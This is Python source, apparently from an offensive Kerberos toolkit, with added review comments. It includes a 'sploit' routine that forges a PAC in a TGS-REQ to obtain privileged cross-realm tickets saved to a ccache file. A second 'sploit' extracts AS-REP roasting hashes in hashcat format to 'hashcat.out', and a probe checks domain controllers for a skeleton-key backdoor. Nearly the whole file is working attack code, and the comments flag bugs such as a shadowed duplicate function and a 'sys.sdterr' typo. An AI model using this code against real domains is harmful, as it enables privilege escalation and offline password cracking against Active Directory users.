def net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a):
    """Run one AS exchange against *kdc_a* and keep the raw AS-REP hex in krbTricks.set_arg.

    The optional ``'pre'`` entry of ``krbTricks.set_arg`` steers two things:
    when it is present and ``== True`` the request uses padata type 2 and the
    reply is stored under ``'net_krbas_tgs'``; when it is present with any
    other value the request uses padata type 149 and the reply goes to
    ``'net_krbas'``.  When ``'pre'`` is absent, ``'padata_type'`` is *not*
    written here and must already exist in set_arg (otherwise the lookup
    below raises KeyError), and the reply is stored under ``'net_krbas'``.
    *user_sid* is accepted but never used.  Progress messages go to stderr.
    Returns None.
    """
    args = krbTricks.set_arg
    if 'pre' in args:
        # 2 / 149 are handed straight to build_as_req; what they select is
        # defined there, not in this function.
        args['padata_type'] = 2 if args['pre'] == True else 149

    def announce(msg):
        # The "[+] ..." prefix lines are flushed so they show before the
        # blocking network call that follows; the " Done!" lines are not.
        sys.stderr.write(msg)
        sys.stderr.flush()

    announce(' [+] Building AS-REQ for %s@%s...' % (user_name, user_realm))
    req_nonce = getrandbits(31)
    now = time()
    # Sixth positional argument is pac_request (always False here).
    as_req = build_as_req(user_realm, user_name, user_key, now, req_nonce, False,
                          args['padata_type'])
    sys.stderr.write(' Done!\n')

    announce(' [+] Sending AS-REQ to %s...' % kdc_a)
    sock = send_req(as_req, kdc_a)  # NOTE(review): not closed here; confirm recv_rep closes it
    sys.stderr.write(' Done!\n')

    announce(' [+] Receiving AS-REP from %s...' % kdc_a)
    reply = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    hdata = binascii.b2a_hex(reply)
    store = krbTricks.set_arg
    is_pre = 'pre' in store and store['pre'] == True
    store['net_krbas_tgs' if is_pre else 'net_krbas'] = hdata
def check(self, domain, dc_name, account):
    """Send one AES256-only AS-REQ for *account* to ``<dc_name>.<domain>`` and print the error code.

    The request is built with no key (``None``), pac_request ``True`` and
    ``AES256`` as the seventh positional argument (the same slot that
    net_get_as_rep fills with a padata type -- presumably a different
    build_as_req; confirm which one is in scope).  The reply is decoded as a
    KrbError and its ``error-code`` printed.  The original author left a TODO
    on the ``KDC_ERR_ETYPE_NOSUPP`` branch (their note translates as
    "skeleton key found"); today that branch just returns.  Socket timeouts
    and refused connections are swallowed, any other exception is printed
    with a traceback.  Always returns None.  Does not touch ``self``.

    NOTE(review): ConnectionRefusedError is Python 3 only while other
    functions in this file use Python 2 ``print >>`` syntax.
    """
    req_nonce = getrandbits(31)
    now = time()
    kdc_dns = "{dc_name}.{domain}".format(dc_name=dc_name, domain=domain)
    as_req = build_as_req(get_netbios_domain(domain), account, None, now,
                          req_nonce, True, AES256)
    try:
        sock = send_req(as_req, kdc_dns)
        reply = recv_rep(sock)
        err_enc = decode(reply, asn1Spec=KrbError())[0]
        print(err_enc['error-code'])
        if err_enc['error-code'] == KDC_ERR_ETYPE_NOSUPP:
            # TODO: skeleton key found (translated from the original note)
            return
    except (timeout, ConnectionRefusedError):
        # Unreachable / slow DC: deliberately silent, same as the original.
        pass
    except Exception:
        traceback.print_exc()
def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None):
    """First of two ``sploit`` definitions in this module.

    The second definition below has the same name (and no ``user_sid``
    parameter), so at import time it rebinds the name and this body is
    unreachable unless the module is reordered.

    As written: AS-REQ/AS-REP against *kdc_a* decrypted with *user_key*;
    then a TGS-REQ to *kdc_a* for ``krbtgt/target_realm`` that carries a
    PAC built by build_pac() from (user_realm, user_name, user_sid,
    logon_time); then, only when *target_service*, *target_host* and
    *kdc_b* are all given, a second TGS-REQ to *kdc_b*; finally the last
    TGS-REP is written as a credential to a ccache at *output_filename*.
    The three optional ``*_key`` arguments only enable debug dumps via
    ticket_debug().  Python 2 only (``print >>``, str() on key bytes).
    Returns None.
    """
    sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    nonce = getrandbits(31)
    current_time = time()
    as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False)
    sys.stderr.write(' Done!\n')
    sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    # NOTE(review): sock is reassigned per request and never closed in this
    # function; confirm recv_rep closes it.
    sock = send_req(as_req, kdc_a)
    sys.stderr.write(' Done!\n')
    sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')
    sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
    # (keytype, keyvalue) tuple reused as the TGT session key for the TGS-REQ.
    session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue']))
    logon_time = gt2epoch(str(as_rep_enc['authtime']))
    tgt_a = as_rep['ticket']
    sys.stderr.write(' Done!\n')
    if krbtgt_a_key is not None:
        # BUG: 'sys.sdterr' is a typo for sys.stderr; this branch raises
        # AttributeError whenever krbtgt_a_key is supplied.
        print >> sys.sdterr, as_rep.prettyPrint()
        print >> sys.stderr, as_rep_enc.prettyPrint()
        ticket_debug(tgt_a, krbtgt_a_key)
    sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    subkey = generate_subkey()
    nonce = getrandbits(31)
    current_time = time()
    # pac is a (type, bytes) pair; pac[1] is what pretty_print_pac receives below.
    pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time))
    tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name, tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False)
    sys.stderr.write(' Done!\n')
    sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    sock = send_req(tgs_req, kdc_a)
    sys.stderr.write(' Done!\n')
    sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')
    # No flush here, unlike the other "[+]" lines (original behaviour kept).
    sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a)
    tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
    session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue']))
    tgt_b = tgs_rep['ticket']
    sys.stderr.write(' Done!\n')
    if trust_ab_key is not None:
        pretty_print_pac(pac[1])
        print >> sys.stderr, tgs_rep.prettyPrint()
        print >> sys.stderr, tgs_rep_enc.prettyPrint()
        ticket_debug(tgt_b, trust_ab_key)
    # Second hop only when every target parameter is present; otherwise the
    # first TGS-REP is what ends up in the ccache.
    if target_service is not None and target_host is not None and kdc_b is not None:
        sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b)
        sys.stderr.flush()
        subkey = generate_subkey()
        nonce = getrandbits(31)
        current_time = time()
        tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name, tgt_b, session_key2, subkey, nonce, current_time)
        sys.stderr.write(' Done!\n')
        sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b)
        sys.stderr.flush()
        sock = send_req(tgs_req2, kdc_b)
        sys.stderr.write(' Done!\n')
        sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b)
        sys.stderr.flush()
        data = recv_rep(sock)
        sys.stderr.write(' Done!\n')
        sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b)
        tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
        sys.stderr.write(' Done!\n')
    else:
        tgs_rep2 = tgs_rep
        tgs_rep_enc2 = tgs_rep_enc
    sys.stderr.write(' [+] Creating ccache file %r...' % output_filename)
    cc = CCache((user_realm, user_name))
    tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2)
    cc.add_credential(tgs_cred)
    cc.save(output_filename)
    sys.stderr.write(' Done!\n')
    if target_key is not None:
        print >> sys.stderr, tgs_rep2.prettyPrint()
        print >> sys.stderr, tgs_rep_enc2.prettyPrint()
        ticket_debug(tgs_rep2['ticket'], target_key)
def sploit(user_realm, user_name, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None):
    """Second ``sploit`` definition; being later in the module it is the one callers get.

    It drops the ``user_sid`` parameter of the first definition, so any call
    site written against that signature breaks.  Only the AS exchange
    against *kdc_a* is live: the AS-REQ is built with ``pac_request=True``,
    the reply goes through decrypt_as_rep(data, user_key), and the result is
    hex-encoded into a ``$krb5asrep$23$user@realm:...`` line written to
    stderr and appended to the hard-coded file ``hashcat.out``.  The TGS
    hops and the ccache step were commented out, so *kdc_b*, *target_\**,
    *output_filename* and the ``*_key`` arguments are accepted but unused.

    NOTE(review): the result of decrypt_as_rep is iterated byte by byte with
    ord(), which only works on a Python 2 str -- presumably it returns the raw
    enc-part when *user_key* is None; confirm.  The ``23`` in the output label
    is a literal, not read from the reply's etype.  Returns None.
    """
    sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    # NOTE(review): nonce is a fixed constant here (the getrandbits(31) call
    # used by every other function in this file was commented out), so each
    # request differs only in its timestamp.
    nonce = 12381973
    current_time = time()
    as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=True)
    sys.stderr.write(' Done!\n')
    sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    sock = send_req(as_req, kdc_a)  # NOTE(review): never closed here; confirm recv_rep closes it
    sys.stderr.write(' Done!\n')
    sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')
    sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
    sys.stderr.write(' Done!\n')
    # Hex of as_rep_enc, split after the first 16 bytes (32 hex chars) with a '$'.
    enc_string = "".join("{:02x}".format(ord(c)) for c in as_rep_enc)
    hashcat_enc = enc_string[:32] + '$' + enc_string[32:]
    sys.stderr.write('$krb5asrep$23$%s@%s:%s\n' % (user_name, user_realm, hashcat_enc))
    # The TGS-REQ / second-hop / ccache code of the first sploit() definition
    # was present here as commented-out lines; it is not executed.
    # Output as-rep to file (hard-coded) atm
    # NOTE(review): 'file' shadows the builtin, the path is hard-coded, and the
    # handle is closed manually rather than with a `with` block -- an exception
    # in write() leaks it.
    file = open("hashcat.out", "a")
    file.write('$krb5asrep$23$%s@%s:%s\n' % (user_name, user_realm, hashcat_enc))
    file.close()